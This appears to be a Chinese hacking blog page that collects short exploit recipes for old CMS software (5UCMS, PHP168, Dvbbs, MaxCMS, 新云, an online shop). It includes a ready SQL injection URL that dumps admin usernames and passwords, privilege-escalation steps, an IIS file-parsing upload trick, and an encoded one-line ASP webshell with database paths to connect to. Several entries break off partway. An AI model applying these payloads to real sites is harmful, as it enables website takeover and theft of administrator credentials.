无忧无忧网络文章管理系统(5UCMS)注入漏洞

后台地址:admin/Login.asp

 

数据库路径:inc/db  目录下

漏洞地址:admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from 5u_Admin&id=1%20and%201=2%20UNION%20select%201%20from 5u_Admin
...

php168 buy获取管理员权限0day

漏洞利用:
1.注册普通用户
2.通过 http://site/buygroup.php?job=buy&gid=3购买管理员权限 。
3.后台 那2webshell

PHP168后台查看/修改任意文件漏洞

影响版本:
PHP168所有带模板编辑的版本
漏洞描述:
PHP168整站系统一直以来受广大用户的亲睐,它凭借着自身的强大、稳定、安全、灵活、

易用等多方面的优势 ... 架构与功能的不断完善,让PHP168成为了最主流CMS系统之一。...

动网任意上传漏洞

影响版本:Powered By Dvbbs Version 8.2.0Powered By Dvbbs Version 8.1.0Powered By Dvbbs Version 8.0.0注册用户-我的主页-个人空间管理userspace.asp?sid=0&act=modifyset然后编辑CSS风格-文件管理Dv_plus/myspace/script/filemange.asp其实还是利用了Microsoft IIS 解析文件名“x.asp;x.jpg/x.php;x.jpg”漏洞...

马克斯电影程序(MaxCMS)V2.5漏洞

马克斯电影程序(MaxCMS)V2.5,类似新云漏洞数据库地址为inc/datas.asp 在留言本直接插入┼攠數畣整爠煥敵瑳∨≡┩愾 一句话木马连接www.xx.com/inc/datas.asp密码为:a By:fadhack

新云4.0最新0day

访问ask目录,注册用户,
在密码问题的地方插入加密后的一句话:┼攠數畣整爠煥敵瑳∨≡┩愾
注册成功后连接默认数据库:ask/data/ask_newasp.asa 密码:a

易和阳光购物商城V1.1漏洞

在虚拟机上进行安装测试!打开界面如下[IMG=400,300,title]http://www.hackserver.cn/upload/2009/7/200907051002114452.jpg[/IMG] 也可以再g.cn里面搜索:inurl:product.asp?Iheeoid= 首先注册个用户然后用户下订单 [IMG=400,300,title]http://www.hackserver.cn/upload/2009/7/2.jpg/[/IMG] 去收银台 [IMG=400,300,title]http://www.hackserver.cn/upload/2009/7/200907051005241225.jpg[/IMG] ...

«1»
控制面板
网站分类
搜索
文章归档
友情链接
最近发表
Tags列表